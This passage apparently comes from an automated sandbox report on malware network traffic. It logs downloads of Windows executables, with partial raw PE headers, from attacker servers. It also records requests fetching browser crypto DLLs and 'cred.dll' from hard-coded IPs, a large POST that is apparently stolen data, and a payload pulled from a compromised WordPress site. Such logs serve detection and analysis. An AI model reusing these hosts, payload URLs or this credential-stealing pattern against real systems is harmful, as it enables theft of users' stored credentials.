0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:44 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:44 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:44 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Thu, 29 Apr 2021 20:58:44 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Apr 2021 20:58:52 GMTContent-Type: application/octet-streamContent-Length: 290304Last-Modified: Wed, 28 Apr 2021 08:31:27 GMTConnection: keep-aliveETag: "60891d5f-46e00"Cache-Control: public, must-revalidate, proxy-revalidateAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 09 df 90 31 68 b1 c3 31 68 b1 c3 31 68 b1 c3 2f 3a 24 c3 2a 68 b1 c3 2f 3a 32 c3 4e 68 b1 c3 2f 3a 35 c3 18 68 b1 c3 16 ae ca c3 36 68 b1 c3 31 68 b0 c3 b5 68 b1 c3 2f 3a 3b c3 30 68 b1 c3 2f 3a 23 c3 30 68 b1 c3 2f 3a 25 c3 30 68 b1 c3 2f 3a 20 c3 30 68 b1 c3 52 69 63 68 31 68 b1 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2e 62 ae 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 38 01 00 00 e2 09 00 00 00 00 00 43 2d 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 0b 00 00 04 00 00 2e ae 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 89 01 00 62 00 00 00 2c 7e 01 00 50 00 00 00 00 30 0a 00 b0 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 52 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 73 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 36 01 00 00 10 00 00 00 38 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 72 39 00 00 00 50 01 00 00 3a 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 9a 08 00 00 90 01 00 00 00 02 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 f7 00 00 00 30 0a 00 00 f8 00 00 00 76 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Apr 2021 20:59:10 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16Last-Modified: Fri, 23 Apr 2021 10:22:14 GMTETag: "1f200-5c0a12b672180"Accept-Ranges: bytesContent-Length: 127488Content-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 96 01 00 00 58 00 00 00 00 00 00 84 a4 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 40 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 9c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 9c 94 01 00 00 10 00 00 00 96 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 dd 09 00 00 00 d0 01 00 00 00 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 ae 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 40 00 00 00 00 f0 01 00 00 02 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 9c 1d 00 00 00 00 02 00 00 1e 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 de 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Apr 2021 20:59:21 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16Last-Modified: Fri, 23 Apr 2021 10:22:18 GMTETag: "37800-5c0a12ba42a80"Accept-Ranges: bytesContent-Length: 227328Content-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 0a 03 00 00 6a 00 00 00 00 00 00 30 19 03 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 03 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 70 03 00 3f 00 00 00 00 50 03 00 d0 12 00 00 00 b0 03 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 08 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 48 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 60 12 00 00 00 20 03 00 00 14 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 a5 0a 00 00 00 40 03 00 00 00 00 00 00 22 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 d0 12 00 00 00 50 03 00 00 14 00 00 00 22 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 3f 00 00 00 00 70 03 00 00 02 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 08 26 00 00 00 80 03 00 00 28 00 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 18 00 00 00 b0 03 00 00 18 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 00 00 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: POST /873 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 78.47.81.226Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 108331Host: 78.47.81.226Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /wp-content/themes/cinestar/extendvc/xsrv2.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: ukedocumentary.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: GET /Hnq8vS/plugins/cred.dll HTTP/1.1Host: 176.111.174.114
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
